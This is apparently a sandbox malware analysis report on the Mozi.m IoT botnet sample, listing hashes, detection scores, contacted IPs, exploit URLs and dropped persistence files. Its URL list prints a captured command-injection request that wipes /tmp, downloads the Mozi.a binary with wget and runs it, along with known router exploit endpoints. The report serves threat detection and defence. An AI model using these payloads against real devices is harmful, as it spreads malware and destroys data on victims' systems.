Mozi.m

Status: finished

Submission Time: 2020-04-21 22:56:15 +02:00

Malicious

Spreader

Trojan

Evader

Mirai

Comments

Details

Analysis ID:
224306
API (Web) ID:
345204
Analysis Started:

2020-04-21 22:56:16 +02:00
Analysis Finished:

2020-04-21 23:10:54 +02:00
MD5:
4dde761681684d7edad4e5e1ffdb940b
SHA1:
2327be693bc11a618c380d7d3abc2382d870d48b
SHA256:
d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
Technologies:

Engines
IOCs

Joe Sandbox

Engine	Download Report	Detection	Info
	Full Report Management Report IOC Report	malicious Score: 100	System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

Open Full Report

malicious

Score: 37/58

Open Full Report

malicious

Score: 16/40

malicious

Score: 17/31

malicious

IPs

IP	Country	Detection
120.76.224.67	China
202.144.169.183	Australia
37.35.144.69	Spain
Click to see the 97 hidden entries
109.25.230.143	France
2.251.35.107	Sweden
220.27.23.115	Japan
87.105.97.67	Poland
195.145.20.241	Germany
165.48.146.111	United States
22.136.13.71	United States
27.208.42.21	China
93.193.25.5	Germany
212.233.102.140	Russian Federation
112.69.99.34	Japan
100.50.96.134	United States
200.124.72.70	unknown
167.52.221.238	Canada
63.219.178.190	United States
41.205.252.99	Sierra Leone
91.60.67.195	Germany
31.143.138.11	Turkey
170.104.2.43	United States
181.242.104.185	Colombia
74.50.64.231	United States
166.92.241.186	United States
216.238.159.233	United States
194.23.79.82	Sweden
179.95.130.38	Brazil
27.141.89.251	Japan
116.120.189.146	Korea Republic of
33.134.232.221	United States
79.105.97.107	Russian Federation
130.250.10.169	United States
216.81.104.234	United States
74.164.242.137	United States
79.95.18.115	France
8.101.42.109	United States
128.16.44.205	United Kingdom
173.197.98.207	United States
188.81.82.200	Portugal
80.87.217.17	Slovakia (SLOVAK Republic)
185.49.116.41	Slovenia
132.86.10.151	United States
118.36.61.250	Korea Republic of
70.20.58.252	United States
7.251.52.241	United States
187.172.5.233	Mexico
184.66.6.216	Canada
221.203.14.87	China
69.204.115.234	United States
184.28.138.61	United States
188.165.19.41	France
151.36.2.193	Italy
112.155.143.53	Korea Republic of
182.25.148.205	Indonesia
137.78.4.151	United States
194.130.25.8	United Kingdom
176.184.13.167	France
4.116.242.9	United States
193.47.67.143	Italy
124.69.89.81	China
171.6.174.53	Thailand
128.208.78.200	United States
154.97.159.19	Sudan
203.189.124.129	Australia
206.139.49.93	United States
212.188.254.125	United Kingdom
193.66.44.224	Finland
166.56.211.57	United States
109.0.49.230	France
75.12.37.28	United States
38.141.133.56	United States
209.183.131.124	Canada
163.188.177.226	United States
121.35.138.40	China
197.165.32.64	Egypt
184.198.125.168	United States
77.178.122.225	Germany
48.201.208.11	United States
54.160.221.37	United States
14.156.206.8	China
6.199.46.12	United States
40.61.159.220	United States
77.47.9.92	Germany
210.199.246.140	Japan
112.239.47.58	China
220.42.247.39	Japan
170.249.181.99	United States
129.194.52.156	Switzerland
144.179.234.10	Norway
144.43.205.101	Netherlands
92.226.57.209	Germany
47.215.228.10	United States
136.72.81.153	United States
136.14.5.72	United States
53.121.11.219	Germany
69.195.84.236	United States
219.14.161.7	Japan
170.176.148.226	United States
159.76.43.248	United States

URLs

Name	Detection
http://208.121.65.32:80/HNAP1/
http://207.183.160.89:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://162.144.38.224:80/HNAP1/
Click to see the 41 hidden entries
http://156.244.14.199:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://103.249.6.223:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.9.87.113:80/HNAP1/
http://93.155.211.48:80/HNAP1/
http://14.200.100.50:80/HNAP1/
http://104.19.204.118:80/HNAP1/
http://35.230.71.37:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.106.198.80:80/HNAP1/
http://35.190.27.245:80/HNAP1/
http://46.105.86.249:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://199.19.109.8:80/HNAP1/
http://172.224.185.205:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://62.41.160.55:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:5555/UD/act?1
http://97.102.243.81:80/HNAP1/
http://2.185.186.207:80/HNAP1/
http://2.186.68.215:80/HNAP1/
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://62.212.124.97:80/HNAP1/
http://107.183.104.39:80/HNAP1/
http://127.0.0.1:80/GponForm/diag_Form?images/
http://123.57.22.90:80/HNAP1/
http://174.127.208.187:80/HNAP1/
http://180.252.172.228:80/HNAP1/
http://99.86.127.40:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://43.248.107.91:37215/ctrlt/DeviceUpgrade_1
http://www.alsa-project.org.
http://129.125.81.18:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.pastebin.ca.
http://120.83.13.207:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.alsa-project.org/alsa-info.sh
http://www.pastebin.ca
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://www.alsa-project.org/cardinfo-db/
http://www.pastebin.ca/upload.php
http://www.alsa-project.org
http://upx.sf.net
http://118.193.52.146:80/HNAP1/
http://211.59.13.76:49152/soap.cgi?service=WANIPConn1
http://pastebin.ca)

Dropped files

Name	File Type	Hashes
/etc/init.d/mountdevsubfs.sh	ASCII text	#
/usr/networks	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped	#
/etc/rcS.d/S95baby.sh	POSIX shell script, ASCII text executable	#
Click to see the 97 hidden entries
/etc/rc.local	ASCII text	#
/etc/profile.d/vte-2.91.sh	ASCII text	#
/etc/profile.d/cedilla-portuguese.sh	ASCII text	#
/etc/profile.d/bash_completion.sh	ASCII text	#
/etc/profile.d/apps-bin-path.sh	ASCII text	#
/etc/profile.d/Z97-byobu.sh	ASCII text	#
/etc/init.d/umountnfs.sh	ASCII text	#
/etc/init.d/mountnfs.sh	ASCII text	#
/etc/init.d/mountnfs-bootclean.sh	ASCII text	#
/etc/init.d/mountkernfs.sh	ASCII text	#
/etc/init.d/mountall.sh	ASCII text	#
/etc/init.d/hwclock.sh	ASCII text	#
/etc/init.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/etc/init.d/bootmisc.sh	ASCII text	#
/etc/init.d/checkfs.sh	ASCII text	#
/etc/init.d/checkroot-bootclean.sh	ASCII text	#
/etc/init.d/checkroot.sh	ASCII text	#
/etc/init.d/hostname.sh	ASCII text	#
/etc/init.d/mountall-bootclean.sh	ASCII text	#
/usr/share/doc/git/contrib/remotes2config.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-revert.sh	ASCII text	#
/usr/share/doc/git/contrib/rerere-train.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/git-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh	ASCII text	#
/usr/share/doc/git/contrib/git-resurrect.sh	ASCII text	#
/usr/share/doc/git/contrib/fast-import/git-import.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-tag.sh	ASCII text	#
/usr/share/doc/netcat-openbsd/examples/dist.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-resolve.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-reset.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-repack.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-pull.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-notes.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge.sh	ASCII text	#
/usr/share/doc/mdadm/examples/mdadd.sh	ASCII text	#
/usr/share/keyutils/request-key-debug.sh	ASCII text	#
/usr/share/hplip/hplip_clean.sh	ASCII text	#
/usr/share/doc/xdotool/examples/ffsp.sh	ASCII text	#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh	ASCII text	#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh	ASCII text	#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh	ASCII text	#
/usr/share/doc/gdb/contrib/gdb-add-index.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh	ASCII text	#
/usr/share/doc/libsane/plustek/MakeModule.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/ping-places.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/get-mac-address.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/check-mac-address.sh	ASCII text	#
/etc/wpa_supplicant/ifupdown.sh	ASCII text	#
/usr/share/doc/acpid/examples/ac.sh	ASCII text	#
/usr/share/debconf/confmodule.sh	ASCII text	#
/usr/share/cups/braille/indexv4.sh	ASCII text	#
/usr/share/cups/braille/indexv3.sh	ASCII text	#
/usr/share/cups/braille/index.sh	ASCII text	#
/usr/share/cups/braille/cups-braille.sh	UTF-8 Unicode text	#
/usr/share/brltty/initramfs/brltty.sh	ASCII text	#
/usr/share/alsa/utils.sh	ASCII text	#
/usr/share/alsa-base/alsa-info.sh	ASCII text, with very long lines	#
/usr/share/doc/acpid/examples/default.sh	ASCII text	#
/etc/wpa_supplicant/functions.sh	ASCII text	#
/etc/wpa_supplicant/action_wpa.sh	ASCII text	#
/etc/libreoffice/soffice.sh	ASCII text	#
/etc/bash_completion.d/libreoffice.sh	ASCII text	#
/etc/acpi/undock.sh	ASCII text	#
/etc/acpi/tosh-wireless.sh	ASCII text	#
/etc/acpi/powerbtn.sh	ASCII text	#
/etc/acpi/ibm-wireless.sh	ASCII text	#
/etc/acpi/asus-wireless.sh	ASCII text	#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-log.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-gc.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-fetch.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-commit.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clone.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clean.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-checkout.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-am.sh	OS/2 REXX batch file, ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh	ASCII text	#
/etc/acpi/asus-keyboard-backlight.sh	ASCII text	#
/usr/share/doc/gdb/contrib/expect-read1.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh	ASCII text	#
/usr/share/doc/gawk/examples/prog/igawk.sh	awk or perl script, ASCII text	#
/usr/share/doc/gawk/examples/network/PostAgent.sh	ASCII text	#
/usr/share/doc/cron/examples/cron-tasks-review.sh	ASCII text	#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh	ASCII text	#

Mozi.m

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

URLs

Dropped files

Mozi.m Options

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

URLs

Dropped files

Search started

Mozi.m